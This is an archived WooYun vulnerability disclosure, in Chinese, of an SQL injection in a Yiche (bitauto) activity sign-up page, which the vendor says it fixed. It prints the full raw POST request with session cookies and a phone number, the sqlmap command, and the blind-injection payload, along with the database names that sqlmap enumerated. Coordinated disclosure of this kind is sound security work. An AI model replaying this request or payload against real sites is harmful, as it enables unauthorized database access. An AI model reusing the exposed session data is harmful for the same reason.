易车某站SQL注入

admin 2017年3月25日16:18:18评论287 views字数 201阅读0分40秒阅读模式
摘要

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-187241

漏洞标题: 易车某站SQL注入

相关厂商: 易车

漏洞作者: null_z

提交时间: 2016-03-21 15:10

公开时间: 2016-05-05 19:38

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射

0人收藏


漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

。。。

详细说明:

注入点需要登录,注入参数 style_id

code 区域
POST /activity/signup/3288?t=1458530884127 HTTP/1.1
Host: tuan.bitauto.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36
Referer: http://tuan.bitauto.com/activity/BC-3288/10075/4597?c=201
Cookie: locatecity=310100; BitAutoLogId=6dfd26f0fc37058d30b23bd7786aec72; .ASPXAUTH=2AD5F4D838711E39F5111A0FF5F8BD56401A228A68F46A57D7C54C7B9C4274D89EDCF361599C33B892BB5A532B0971AFE98D082E2EE6D075001B63C6FEE0EF0D6046A13539E7683D8C2CE1B6A860487FD2F3353666776470331193188F5C2CCD9DCB04E77D0FCD4410F45D8CC31B26E95F84B2AB1E7ECD51999D150A0C723F9E786792488F398EB9B49F935A695028A15E4E99B691A09CE0CDB943650F6F682DC72637CB87C623D5073D859FD3EBF19F530C72CD; userid=17665999; username=wooyun1v; CIGDCSCD=1458394063; pgv_pvi=5739682816; yh_uid=63e98239755e46d4991c20c716b220e5; bglogId=9654ce11-5aa9-634f-5ee3-f2dc9ca2dc6c; CarStateForBitAuto=427f49dc-0fc4-a109-b47c-2411b3a13a8e; ScrollTreeNodeTop=1702; selectcity=420000; dm10=4%7C1458438029%7C1%7Cvc.yiche.com%7C%2Fcate_5_6_0.html%7C%7C%7C1452669940%7C1455605693%7C1458394187%7C1458437684%7C57884201601131525385695fbf243a30%7C0%7C%7C; dm_rff10=222.187.224.23%252Fyiche.html%5B%5Dcar.bitauto.com%252F%253FWT.OUT%253D2%5B%5D2%5B%5D; dcad10=; dc_search10=; pgv_si=s2533709824; UserBorsingHistory17665999=1458530595285; HDTCK=yes; tuan[pctuanlocation]=Q2FrZQ%3D%3D.nRdt1ME5Wg0dPV7BWnRAgOONRl8N7yGfmGyhXVaI2g%2B5wKrfN33%2Fitih3zHJYK%2BtnRCo2mbt%2FLUrnhSOr%2FKRGgrQ4FBrOXkJrMyCHNBiB1PvMSSFf9lbt%2F%2BH7cu5hcwU%2BF9fQjVMQrWTSFaJEHrLDOuofiAXj26lybXpwglffZhVU5bE%2FtSue9rs348Qba%2Fz6bpog2LKsX3HuETpC6eT4lA%3D; tuan[pctuanlocation_sin]=Q2FrZQ%3D%3D.1wwzgts2QQgZOw%3D%3D; dmt106=11%7C0%7C0%7Ctuan.bitauto.com%2Factivity%2FBC-3288%2F10075%2F4597%3Fc%3D201%7Ctuan.bitauto.com%2Fhotcx; dmts106=1; dm106=2%7C1458530870%7C0%7C%7C%7C%7C%7C1458394063%7C1458394063%7C1458394063%7C1458530595%7C57884201601131525385695fbf243a30%7C0%7C%7C; dm_rff106=%5B%5Dtuan.bitauto.com%252Ferrorcity%5B%5D0%5B%5D; dcad106=; dc_search106=; CIGDCID=57884201601131525385695fbf243a30; CIGDCTP=0; CIGDCTS=0; CIGDCAD=; CIGDCSE=
Client-Ip:


ename=%25E8%25B5%25B5%25E6%25AD%25A6&actAgreement=on&auto_style=4597&city=&carStyle=117360&makeid=10075&cartype=2&search%255B%255D=&source=&fversion=3&timetype=2&etel=13439549088&alltype=1&licenseProv=2&ad_source=&ipcity=1207&style_id=4597*&licenseCity=201
code 区域
sqlmap -r 2.txt --dbms="mysql" --random-agent --dbs

易车某站SQL注入

漏洞证明:

code 区域
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
current database: 'hd_huodong'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #2* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
ename=%E8%B5%B5%E6%AD%A6&actAgreement=on&auto_style=4597&city=&carStyle=117360&makeid=10075&cartype=2&search%5B%5D=&source=&fversion=3&timetype=2&etel=13439549088&alltype=1&licenseProv=2&ad_source=&ipcity=1207&style_id=4597 AND 5565=5565&licenseCity=201
---
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] hd_huodong
[*] hd_parter
[*] hd_statistics
[*] information_schema
[*] test

修复方案:

。。。

版权声明:转载请注明来源 null_z@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-03-21 19:38

厂商回复:

非常感谢对易车的帮助,我们会尽快处理,谢谢

最新状态:

2016-03-22:已经修复完成,非常感谢对易车的支持,谢谢


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin